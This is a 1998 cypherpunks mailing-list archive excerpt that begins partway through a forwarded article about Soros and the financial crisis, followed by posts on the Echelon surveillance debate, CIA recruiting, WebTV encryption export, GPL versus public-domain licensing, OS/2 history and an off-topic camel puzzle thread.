financiers, launched a scathing attack yesterday
on governments and bankers alike for causing a
financial crisis so severe that it could topple the
world's economic system. 

"I am very concerned because it will lead to
basically the breakdown of the global capitalist
system," he said. 

Coming from a pre-eminent global capitalist, his
words are all the more striking because he
advises new restraints on the movement of
international cash. 

He spoke as the annual meetings of the
International Monetary Fund and the World Bank
wrestled with a financial crisis that has wrecked
Asia and Russia and now threatens Latin
America. 

Mr Soros, in his speech and in a book to be
published next month, attacks free marketeers -
or "market fundmentalists," as he calls them - for
weakening the world financial system,
impoverishing developing countries and
threatening democracy itself. 

Governments have botched their efforts to tackle
the crisis. "The authorities have failed to control
the situation," he said. "The G7 or the G whatever
should have been shut into a room and hammered
this out." 

Mr Soros said that in the future, limits would have
to be put on the global casino to prevent it from
destabilising states and societies. 

"Some restraints on capital movements would
have been very useful to protect countries against
the onslaught of the wrecking ball," he said. 

"The free movement of capital, totally free flow, is
not advisable." 

Mr Soros is chairman of Soros Fund
Management, a leading financier who speculated
against the pound - and won handsomely - in
1992. But he has become increasingly convinced
that pure capitalism is just as dangerous to the
world as communism, and has become a leading
advocate of an economic third way. 

"We have been living with and basing ourselves
on a false model of how financial markets
operate," he said. 

Markets are capable of tipping into instability so
severe that it threatens the roots of democracy
itself. 

"It is market fundamentalism that has rendered the
global capitalist system unsound and
unsustainable," he writes in his book The Crisis of
Global Capitalism, a section of which was
released yesterday. 

So great had financial instability become that
"market fundamentalism is today a greater threat
to open society than totalitarian ideology", said
Mr Soros, who grew up under first Nazi, then
Communist rule in Hungary. 

"Market forces, if they are given complete
authority even in the purely economic and
financial arenas, will produce chaos and could
ultimately lead to the downfall of the global
democratic capitalist system." 

The impact had been particularly hard on
developing nations forced to follow the course set
by western institutions and banks, he said. 

"Conditions have tilted too far towards the
countries at the centre of capitalist system to the
detriment of countries at the periphery. These
conditions are unsustainable." 

The only way to recover from the present crisis
was to organise flows of capital back into the
developing countries, he argued, but so far the
IMF and western governments had been unwilling
to meet this challenge. 

City staff braced for tidal wave of sackings
as banks cut back 

Morale among City high-flyers has reached rock
bottom as they brace themselves for a wave of
redundancies over the coming weeks as a result
of the global financial crisis. 

Although redundancies have now, so far, been
limited, the fear of real collapse and a return to
the austerity of the early 1990's when blue chip
firms like Goldman Sachs were laying off staff by
the thousand, means conspicuous consumption
and optimism are becoming a thing of the past. 

The latest to feel the chill are staff at Warburg
Dillon Reed, one of the City's top securities firms
who are braced for substantial lay-offs in the
wake of last week's disclosures that the bank's
Swiss parent has suffered serious losses from its
investment in high risk hedge-funds. 

Insiders say that Warburg's 4,500 London-based
staff expect announcements detailing cutbacks
later this week. 

The latest quarterly survey of the UK Financial
Services industry by the Confederation of British
Industry and consultants
PricewaterhouseCoopers yesterday showed
business confidence among financial sector firms
falling to its lowest for eight years. 

Firms which have already announced lay-offs
since this present bout of turmoil hit financial
markets include ING Barings, Robert Fleming
and Japanese firms Daiwa and Nikko. 

One of the larger firms Merrill Lynch has already
cancelled its Christmas Party and ordered staff to
cut back on overseas travel, entertainment and
the use of mobile phones in an attempt to save
150m this year. The firm lent billions to high risk
hedge funds. Jobs cuts are expected to follow. 

It is widely feared that at least one big
international bank could go under because of
losses to these highly speculative investment
operations despite last month's 2.4bn bail-out of
Long-Term Capital Management by a consortium
of big international banks. 

With nervous investors sitting on their hands,
traders have had more time to spend in City
drinking haunts to drown sorrows and swap
tidbits about the latest bank to hit trouble. 

The cutbacks are likely to be even more painful
this time round because of the speed with which
this crisis has hit. Many firms were still out there
trying to recruit until late into August, pushing up
salaries for some categories of staff to
stratospheric levels. 

Now those expansion plans have gone on hold.
Prestige office developments in the Square Mile
are being shelved as demand for space has
vanished overnight. 

"First to rise, first to go," said Joseph Toots, a
stockbroker, sipping a glass of zinfandel in a
Broadgate winebar. "My job may be a trifle
insecure at the moment, but who knows, lets wait
until Christmas." Mr Toots knows his bonus
which last year was "definitely six figure", will be
minimal this time around. "Good thing I bought my
house outright," he said. 

But it is not just sports car dealers and Dom
Perignon stockists who are monitoring the
situation with gloomy eyes. 

The downturn in the City is hitting at a time when
High Street shops are already deserted as a result
of the huge rise in the cost of borrowing since last
year. 

Contrary to common perception the City is not
the place where everybody earns a half million
pound bonus; many thirty-somethings are pushing
themselves to the limit, earning what sound like fat
salaries until you hear their commitments. It is
these middle-class, high-income people, whose
wealth is more a prospect than a reality who may
be hit the hardest. 

"We are going to have to have a serious rethink
about everything," said Julia, a consultant. She
says she and her husband are delaying the day
when they will have to sit down and face financial
reality. 

"We earn almost 100,000 between us, but with
the mortgage and the school and the nursery fees
(they have three small children) we're not going to
survive like this." 

She says she was depending on her share
portfolio to cover the mortgage on their three
bedroom terraced house in Islington and it doesn't
anymore. "The house may have to be sold," she
says, "and god knows how we will afford the
school fees." 

It may sound like a yuppie problem, but smaller
things have been known to drive people into
domestic conflict. 

Isobel Thacker, a banker, said the same problem
has just made her cancel plans to move house. "I
can't afford to move anymore, we're all staying
put," she said. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:40:35 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Did EU Scuttle Echelon Debate?
Message-ID: <199810070334.UAA27166@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Did EU Scuttle Echelon Debate?
Date: Tue, 06 Oct 1998 09:25:41 -0500
To: believer@telepath.com

Source:  Wired
http://www.wired.com/news/news/politics/story/15429.html

 Did EU Scuttle Echelon Debate?
 By Niall McKay 

 5:15 p.m.5.Oct.98.PDT
 The European Parliament has swept aside
 concerns about alleged surveillance and spying
 activities conducted in the region by the US
 government, a representative for Europe's Green
 Party said Monday. 

 Specifically, the EU allegedly scuttled
 parliamentary debate late last month concerning
 the Echelon surveillance system. Echelon is a
 near-mythical intelligence network operated in
 part by the National Security Agency. 

 "The whole discussion was completely brushed
 over," Green Party member of European
 Parliament Patricia McKenna said. 

 The US government has refused even to
 acknowledge Echelon's existence. But since
 1988, investigative journalists and privacy
 watchdogs have uncovered details of a secret,
 powerful system that can allegedly intercept any
 and all communications within Europe. 

 According to scores of reports online and in
 newspapers, Echelon can intercept, record, and
 translate any electronic communication --
 telephone, data, cellular, fax, email, telex -- sent
 anywhere in the world. 

 The alleged system has only recently come
 under the scrutiny of the European Parliament,
 which has grown concerned about EU
 government and private sector secrets falling into
 US hands. 

 The debate fizzled mysteriously, said McKenna,
 who suggested that the Parliament is reluctant
 to probe the matter fully for fear of jeopardizing
 relations between the EU and the United States.

 "Basically they didn't want to rock the boat," she
 said. 

 Furthermore, she said the debate was held two
 days ahead of schedule, hindering preparations
 for the discussion by European Members of
 Parliament. 

 While the NSA has never officially recognized
 Echelon's existence, it has been the subject of
 heated debates in Europe following a preliminary
 report by the Scientific and Technical Options
 Assessment, a committee advising the
 parliament on technical matters. 

 On 19 September, the Parliament debated both
 the EU's relationship with the United States and
 the existence and uses of Echelon. 

 The Green Party believes the resolution to defer
 its decision on Echelon, pending further
 investigation, was influenced by pressure from
 the US government, which has tried to keep the
 system secret. 

 Glyn Ford, a member of the European
 Parliament for the British Labor Party and a
 director of STOA, missed the debate because of
 the schedule change but does not share the
 Green Party's view. 

 "There is not enough information on Echelon,
 beyond its existence, to debate the matter fully,"
 said Ford. 

 According to Ford, the Omega Foundation, a
 British human rights organization, compiled the
 first report on Echelon for the Parliament
 committee. 

 "It is very likely that Omega will be
 commissioned again," Ford said. "But this time I
 believe the EU will require direct input from the
 NSA." 

 Simon Davies, the director of the privacy
 watchdog group Privacy International sees the
 debate as a major civil rights victory. 

 "It's unheard of for a parliament to openly debate
 national security issues," said Davies. "This
 debate fires a warning shot across the bows of
 the NSA." 

 Echelon is said to be principally operated by the
 National Security Agency and its UK equivalent,
 the Government Communications Headquarters.
 It reportedly also relies on cooperation with other
 intelligence agencies in Canada, Australia, and
 New Zealand. 

 "These spy systems were seen as a necessary
 part of international security during the cold
 war," said Ford. "But there is no military reason
 for spying on Russia now unless they (NSA)
 want to listen to the sound of the proto-capitalist
 economy collapsing." 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:41:16 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fwd: [Spooks] CIA needs spies. Care to join?
Message-ID: <199810070334.UAA27183@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bridget973@aol.com
Subject: IP: Fwd: [Spooks] CIA needs spies. Care to join?
Date: Tue, 6 Oct 1998 19:10:31 EDT
To: ignition-point@majordomo.pobox.com

Subject:        [Spooks] CIA needs spies. Care to join?
Date:            Mon, 05 Oct 1998 22:48:59 -0500
From:           Bob Margolis <rttyman@wwa.com>
To:               Spooks <spooks@qth.net>




>From the Christian Science Monitor--OCT 5

Cheers,

Bob Margolis

===========

Help Wanted  
   The blonde - a cross between TV's ``La Femme Nikita'' and a  
Washington lawyer - grins knowingly out of the glossy pages of an 
international news magazine. 
   ``Do you have what it takes?'' asks the bold advertising line just  
over her shoulder, paid for by the Directorate of Operations (DO), the 
clandestine service of the Central Intelligence Agency. 
   ``Did you see that one?'' CIA Director George Tenet asks  
enthusiastically of the ad. ``We worked on another one that says, 'If 
you ever liked taking apart your radio and putting it back together, 
we might have a job for you.''' 
   Blame the tight labor market, budget cuts, or low morale fueled by  
post-cold-war mission confusion, but the ad in London's The Economist 
illustrates an acute problem the CIA no longer wants to keep secret: 
It's fast running out of spies. 
   To counter the flight of experienced operatives trained in  
skullduggery, the agency has embarked on the most aggressive 
recruiting drive in its five-decade history. If it can't bolster the 
number of case officers, experts say, the CIA runs the risk of being 
caught flat-footed, as with India's nuclear tests this spring, which 
caught the agency - and thus the United States - unawares. 
   ``We anticipate the current program will rebuild the  
operations-officer cadre by more than 30 percent over the next seven 
years,'' says CIA spokeswoman Anya Guilsher. Augmenting a national 
media campaign is the college-campus recruitment program that has been 
under way for years. 
   But while the agency used to actively recruit at 120 colleges, it  
is now concentrating its efforts at half that number, pinpointing 
universities with strong computer and technical programs and those 
with large numbers of minorities. 
   In addition to the fresh crop of college graduates, the worldly  
wise are also encouraged to apply. 
   ``We are also looking for people with international experience,  
languages, business experience. You are not necessarily going to get 
someone like that right out of college,'' says Ms. Guilsher. Congress 
is pumping a classified amount of money into the recruitment effort. 
   The DO began experiencing sharp losses in personnel nearly seven  
years ago, after the fall of the Soviet Union. By last year, the 
number of people leaving the agency exceeded fresh recruits by 3 or 4 
to 1. 
   Insiders cite a number of reasons for the departures, including  
overall mission drift and the way the CIA has handled spy scandals, 
including mole Aldrich Ames, who funneled secrets to Moscow from 1985 
until his arrest in 1994. 
   Such demoralizing headlines underscore the agency's need for fresh  
recruits as Tenet seeks to reform the CIA. The current hiring drive 
was already in the planning stages when the CIA's failure to detect 
India's nuclear tests last spring solidified recruiting resolve from 
Capitol Hill to the CIA's suburban headquarters in McLean, Va. 
   ``If you had the right number of people in the field doing the  
right thing, the failure wouldn't have occurred,'' says a 
congressional source familiar with agency operations. 
   Intelligence observers estimate total agency employees at just over  
16,000. One estimate places the total number of case workers in the 
field at less than 1,000. ``My guess is most Americans would overguess 
by 10- to 20-fold the numbers out there spying [for the CIA],'' the 
source says. 
   It'S not just the manner in which the recruitment calls are sounded  
that is changing. 
   The agency is also overhauling the way it handles would-be spies.  
In the past, applicants could expect to wait more than a year and a 
half as their application crawled through the hiring bureaucracy. 
   In today's tight labor market, many applicants were simply walking  
away, signing on to higher-paying jobs in the private sector. 
   Today, a CIA contact is assigned to answer applicants' questions,  
and the agency claims the hiring period has been compressed to six to 
eight months. ``We're overhauling our entire recruitment system,'' 
says Tenet. 
   Still, the agency is constricted by government pay scales -  
starting pay for a professional trainee is $30,000, about $5,000 less 
than what the average college graduate received this year. 
   What a CIA job can provide is the cachet of being a CIA agent - the  
lure of being in the know on world affairs. The agency also recruits 
using a rarely discussed theme these days: patriotism. 
   ``Patriotism is not a word used much anymore ... but there are  
still people who learn about the CIA's mission and understand that it 
really does have an important purpose and function and want to work in 
the agency,'' says Ronald Kessler, author of ``Inside the CIA.'' 
   Once in, today's trainees receive a more intensive, highly  
technical education than in the past. ``You can't collect 
[intelligence] in rocket science if you don't know about rocket 
science,'' says a congressional source. Today, a case officer in the 
field receives an average of one to three years of training. 
   Part of the need for greater numbers is sparked by the reopening of  
an undisclosed number of stations in former East Bloc countries, which 
were closed in the early 1990s. 
   The CIA says the reopenings are not necessarily to spy on former  
cold-war adversaries, but rather to monitor a region now transformed 
into a crossroads for weapons for hire.

---
Submissions should be sent to spooks@qth.net
To unsubscribe, send "unsubscribe spooks" to majordomo@qth.net


--
bridget973@aol.com
Black Helicopters on the Horizon:
http://members.xoom.com/bridget973






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Tue, 6 Oct 1998 14:39:43 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com>
Subject: Re: Another potential flaw in current economic theory... (fwd)
In-Reply-To: <199810061803.NAA08378@einstein.ssz.com>
Message-ID: <19981006203553.B18971@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Oct 06, 1998 at 01:03:25PM -0500, Jim Choate wrote:

> Wrong. Socialism is the belief that property is best managed and owned by
> the government. This is within the context of a free market. This means that
> the *ONLY* two parties involved are the producers and consumers. I am
> discussing an alternative approach to business management.

I think the property refered to is "capital goods" or "the means of
production"

> Fascism is the belief that property should be owned by private individuals
> but managed by governments.

how can you "own" something yet not control it?  fascism is a form of
socialism

> Capitalism is the belief that property should be owned and managed by the
> individual. Note that this definition doesn't prevent 3rd party regulatory
> bodies, but they neither own or manage the activity, only limit its' scope.

if a "3rd party regulatory body" has any ability to "limit" through a 
monopoly of force granted by the state it is a part of the state

any true cypherpunk must be a libertarian..

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    travel is fatal to prejudice, bigotry and narrow-mindedness.  -- mark twain 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 6 Oct 1998 13:35:03 +0800
To: Alan Olsen <cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <199810061836.UAA27377@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:31 PM 10/5/98 -0700, Alan Olsen wrote:
>>Why are bananas quantized in the presense of camels?  Is this
>>a quantum-computing thing?
>
>No, it's a Perl thing. ]:>
>

You need to download the Camel extension library..










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 6 Oct 1998 11:25:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Web TV with 128b exported
Message-ID: <199810070119.VAA23135@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: SDN <sdn@divcom.slimy.com>
   >   William H. Geiger III wrote:
   >   > David Honig said:

   >   > >http://biz.yahoo.com/prnews/981005/ca_microso_1.html
   >   > 
   >   > >MOUNTAIN VIEW, Calif., Oct. 5 /PRNewswire/ -- Microsoft Corp.'s (Nasdaq:
   >   > >MSFT - news) WebTV Networks today announced it is the first U.S. company
   >   > >to obtain government approval to export nonkey recovery-based
   >   > >128-bit-strength encryption for general commercial use. WebTV Networks
   >   > >pioneered low-cost access to the Internet, e-mail, financial services and
   >   > >electronic shopping through a television set and a standard phone line. 
   >   > 
   >   > I have my doubts on this. I find it highly unlikely that the FEDs would
   >   > approve this without some form of GAK built in even if it is not in the
   >   > form of "key recovery".
   >
   >   It's probably a lot closer to the "private doorbell" scenario.  The only
   >   thing that a WebTV unit will communicate with is the WebTV service (or
   >   the Japanese variant thereof).
   >
   >   Since all traffic goes through a point that will likely cooperate with
   >   law enforcement (and has remote control of the boxes, too.), this doesn't
   >   represent much of a loosening in the export controls.

Hmmm...

#   http://biz.yahoo.com/prnews/981005/ca_microso_1.html
#   
#   ...without fear of interception by unauthorized parties.

Said with a lawyer's precision.

#   http://biz.yahoo.com/prnews/981005/ca_microso_1.html
#   
#   William Reinsch, U.S.  undersecretary for export administration:
#   ``The WebTV Network provides secure communications for its
#   customers and partners without posing undue risks to
#   national security and law enforcement.'' 

Either it is interceptable and decodable or it isn't.

If it isn't, then software browsers (Netscape/IE) should
be allowed to do it too.

Perhaps Declan could investigate and get a story out of it.

----

Can someone with control of a 128-bit HTTP server see if
it can identify 128-bit keys from WebTV terminals?
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Curtin <cmcurtin@interhack.net>
Date: Tue, 6 Oct 1998 11:37:29 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source   code)
In-Reply-To: <199810051105.HAA13894@germs.dyn.ml.org>
Message-ID: <864sthb1bv.fsf@strangepork.interhack.net>
MIME-Version: 1.0
Content-Type: text/plain



Richard Stallman <rms@santafe.edu> writes:

> I beg your pardon, but this is no mistake.  I'm well aware of the
> people who argue for donating code to companies "so it will be more
> widely used."

This is really an interesting, and subtle, point.  The goals might
well be different, but I suspect they're more complementary than most
of us immediately realize.

Specifically, I'm unconvinced that letting people "steal" our code
really advances the cypherpunk goal of good crypto everywhere (GCE...a
new TLA?).  Proprietary implementations, or proprietary builds of free
or public domain might well claim to be high quality implementations
of well trusted algorithms.

But without access to the source, how do we know?

What if someone makes an RPM of PGP, for example, with a "feature" to
fire your keys off to Big Brother for "backup" and/or "safe keeping"?

-- 
Matt Curtin cmcurtin@interhack.net http://www.interhack.net/people/cmcurtin/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Tue, 6 Oct 1998 15:10:04 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Yet Again Another Snake Oil Vendor
In-Reply-To: <199810062107.RAA26498@domains.invweb.net>
Message-ID: <3.0.5.32.19981006215420.00ad6a90@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 04:14 PM 10/6/98 -0500, William H. Geiger III wrote:
>
>Below is a message I posted to the SpyKing mailing list a few months back
>when Jaws decided to spam the list with their crypto "challange".

One of the networking magazines had a big puff piece on Jaws.  (It read
just like their press release.)

Sad that so-called professional magazines can not sort out the wheat from
the chaff.

No wonder management is so screwed up.  They are getting fed press releases
as information...

---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Tue, 6 Oct 1998 15:32:06 +0800
To: cypherpunks@Algebra.COM
Subject: Interesting document by an anonymous 'guy' (Echelon)
Message-ID: <Pine.LNX.4.02.9810062221440.606-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



Hey, at http://www.bsnet.co.uk/chris/nsa.txt there is an interesting paper
on how the NSA has been spying etcetera to do with  echelon, i would post
some, but it is all good, and is 518K a quick bit from the top....

"I haven't posted or updated it in a while, but here is the gathered
documentation on our governments' massive spying on us, including domestic
phone calls.", then later.....

	"This is about much more than just cryptography.  It is also
	about everyone in the U.S.A. being fingerprinted for a 
	defacto national ID card, about massive illegal domestic
	spying by the NSA, about the Military being in control of 
	key politicians, about always being in a state of war, and 
	about cybernetic control of society"

With the recent talk about Echelon I thought I would bring it up.....

Max

--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <jdobruck@kki.net.pl>
Date: Tue, 6 Oct 1998 09:40:45 +0800
To: cypherpunks@toad.com
Subject: Re: camels and bananas, for some reason.
In-Reply-To: <3.0.5.32.19981005190213.00845510@205.83.192.13>
Message-ID: <361AB42A.7D7C7657@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain



This camel and banana thing has gone WAY out of cypherpunk lane. This sounds like
material for a 'how-to-feed-a-camel-over-long-exposure-to-desert-heat newsgroup'
which, surpassingly, just might exist... not? :- ) prove me wrong :- )

About a year ago there was this program about cars on the Discovery Channel...
forgot it's detail... anyway, this weird prof. and a bunch of his student wanted to
prove that you can make cars with anything... so they got banana peals, cut them
into slices and made forms out of them. This did not create the essence of a car,
the engine, however they did make the chassis into a very nice bright yellow :- )
... OUT OF BANANA PEALS <:- )

So next time you eat breakfast, eat a camel ! .. WAIT... I mean a banana ! :- )

Regards,
Jan Dobrucki

Bill Stewart wrote:

> At 02:21 PM 10/5/98 +0200, Raccoon wrote:
> >On Mon, 5 Oct 1998, Reeza! wrote:
> >
> >> At 11:12 PM 10/4/98 +0200, Anonymous wrote:
> >> >At 12:59 PM 10/3/98 -0400, Michael Motyka wrote:
> >> >>> There is a desert which is 1000 miles across. There is a camel who can
> >> >carry
> >> >>> 1000 bananas maximum. The camel eats 1 banana per mile travelled. The
> >> camel
> >> >>> has a total of 3000 bananas to begin with. What is the maximum number of
> >> >>> bananas that the camel can get across to the other side uneaten?
> >>
> >> Are we stipulating that the camel will travel in a straight line?
> >> Or will it meander a bit, following the path of least resistanct through
> >> the dunes?
> >
> >Since we are looking for the best possible result (=the most bananans
> >moved to the other side), we must assume that the path of least resistance
> >equals a straight line. This may be improbable, but it is not impossible!
> >Remember that this is maths, and that we're looking for the best possible
> >limit.
>
> No, this isn't maths, this is camels, and they'll give you as much
> resistance as they feel like, and *you* may be looking for the most
> bananas moved across the desert, but the camel's perfectly happy to
> sit here and eat all the bananas here, crossing 0 miles of desert,
> or dump you 50 miles out in the desert and come back and eat the
> bananas.
>
> But other than the PERL book, what's it got to do with cypherpunks?
> Just that bananas are related to Bill Clinton?
>
>                                 Thanks!
>                                         Bill
> Bill Stewart, bill.stewart@pobox.com
> PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639


--
Wyslano za posrednictwem bezplatnego serwera KKI
Krakowski Komercyjny Internet - http://www.kki.net.pl

To jest miejsce na reklame Twojej firmy!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Visto  Corporation <Visto_Corporation@visto.com>
Date: Tue, 6 Oct 1998 19:21:11 +0800
To: "'cypherpunks@toad.com>
Subject: Baywatch and Visto?
Message-ID: <A01F6411CF8BD11183DA00805F57F52CA4D79F@visto.com>
MIME-Version: 1.0
Content-Type: text/plain



   


So, you think the people on Baywatch look that way naturally?  Check out
our ENHANCEMENTS. . .



Announcing VISTO BRIEFCASE RELEASE 4.0.  Login to your account at
http://www.briefcase.com to see some great new features:



-- The new SHARED BRIEFCASE lets you share your calendar and files with
anyone you choose.  Organize work groups and share project files
securely, without any special software.  Post wedding or vacation photos
on your shared site, for family and friends across the world to see.
Check out a sample shared briefcase at
http://www.briefcase.com/guest/extremeclub  -- then try your own.



-- The INSTANT IMPORT feature uploads contact and calendar appointments
quickly for all Outlook users with an Internet Explorer browser.



-- We've given you greater email functionality.  Now you can add a
personalized SIGNATURE to all outgoing email messages. And you can
forward mail from your EXTERNAL POP3 accounts right into your Visto
Briefcase.



-- And for our premium service subscribers, the faster, more efficient
BRIEFCASE ASSISTANT now has EMAIL FILTERING and support for LOTUS NOTES
email.



Your Visto Briefcase -- your email, calendar, files, addresses and more
in your own private place on the Web.  Now even more features, no
additional cost.  Login now at http://www.briefcase.com to get the
skinny.





TO REPLY TO THIS MESSAGE, SELECT THE "REPLY TO" FUNCTION FROM YOUR EMAIL
MENU.





10/07/98 02:01:13

[Briefcase Login]

67993






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 6 Oct 1998 19:23:58 +0800
To: "Cypherpunks (E-mail)" <mgering@ecosystems.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F849F@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Matthew James Gering[SMTP:mgering@ecosystems.net] wrote:
> 
>> Though, it does occur to me that the fact that OS/2 has a 
>> stronger faction in Europe than in N. and S. America in 
>> relation to Microsoft may be an indication that continental 
>> saturation is possible.

>The conclusions I would draw from that are IBM as the former market
>giant had a very strong International infrastructure, channels and
>reputation. Since the US market is the principle industry producer, it
>was more competitive and less dominated by IBM. Microsoft, therefore,
>had an easier time in an already competitive US market than breaking in
>overseas. They also had the underdog phenomenon going for them here, the
>local competitive market wanting to break IBM's dominance. The fact that
>OS/2 utterly flopped in the US and found some adopters overseas is
>credit to IBMs international reputation and little else.

No - I was there (here) at the time.  It was early adopters of "client
server" technology who went for OS/2, mainly banks and City finance places.
Of course the currency traders & red braces types (remember "greed is
good"?) used Unix workstations or rather got their minions to use them for
them, but the backoffice applications often went to OS/2.  At the time
Windows 3.0 was just coming out and it wasn't a serious option. (I used to
wander around our office with a folder full of floppies each with a
different tcpip stack  for Windows - they all had *bad* problems). The
Netware people will still mostly on Netware 2 which was a great fileserver
but no kind of application server at all.  The alternative to OS/2 was Unix,
which is where most of these guys went next (& should have gone in the first
place) or sticking with Netware+DOS,  or going to AS400 (which was, and is,
a brilliant platform for exactly these sorts of backoffice, administrative
applications that are usually  programmed badly because no programmer who is
any good can stay awake whilst reading the spec). Of course now everyone
uses SAP.  Or Baan.  

If there are reasons that the small minority of big  OS/2 adopters in Europe
was slightly less small than the even smaller one in the US they are
probably:

- Unix was always better known in the US than Europe

- Lotus Notes took off faster in Europe & it was 100% OS/2 at first (nearest
OS/2 ever got to a "killer app")

- European companies spend less per seat on personal computing than US, and
they were reluctant to lash out on Sun workstations

- home computing in the US was almost totally Microsoft by the time OS/2
came out but not so much in Europe. The consumer market won out over the
business market. 

- European banks and finance places were ahead of US in software development
back then. That's partly because they had been slower to get started
(especially in France & Germany) & so had less mainframe legacy & partly
because the "big bang" deregulation of the UK  stock market (world's 3rd
biggest) and foreign exchange market (world's biggest by a long way - every
dollar in your bank account is on average bought and sold in London more
than once a week) shook up the banks. So they went for "client server"
earlier and at a time when there was no credible MS platform. 

I used to  drive OS/2 for a living (for Lotus Notes mainly). It had a far,
far better user interface than Windows or  most versions of X. But it was
late, slow and never really delivered the reliability or ease of
installation it should have. The Extended Editor was the best programmer's
editor I have ever seen and Rexx is what Basic should have been - a million
Windows programmers suffer every day because of Bill Gates's unreasoning
prejudice against Rexx and his pathetic admiration for Basic - but
installation and maintenance were a nightmare, and the thing ran like a dog
with a broken leg.  When we got the chance to replace it with NT we went for
NT.  But OS/2 versus Windows 3 was a different matter.

Relevance to Cypherpunks? Sort of, in that it shows that a consumer product
(Windows) can beat a business-directed product (OS/2) in the software
market, even if it is inferior. If we want to see ubiquitous strong
cryptography the target market isn't the banks but 14-year-olds in their
bedrooms. 

Ken Brown




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <rick@campbellcentral.org>
Date: Tue, 6 Oct 1998 20:32:22 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810062305.RAA29198@wijiji.santafe.edu>
Message-ID: <199810071026.GAA20270@germs.dyn.ml.org>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3997.1071713808.multipart/signed"

--Boundary..3997.1071713808.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

    Date: Tue, 6 Oct 1998 17:05:42 -0600
    From: Richard Stallman <rms@santafe.edu>
    
    If you want to use our code in non-free software, and leave your users
    (who would then be our users also) no freedom, it is understandable
    that you would ask for this.

No, I simply don't want to discriminate against users who are writing
proprietary software, i. e. I don't want to restrict the freedom of
those users in the way that GPL does.

Public Domain status denotes more freedom than GPL.  It allows all of
the freedom of GPL and in addition, it allows the freedom of making
proprietary modifications.

The results of the proprietary step may be less free than GPL, but the
code placed in the Public Domain is still more free than the code
released under the terms of the GPL.

			Rick


--Boundary..3997.1071713808.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zaWEK
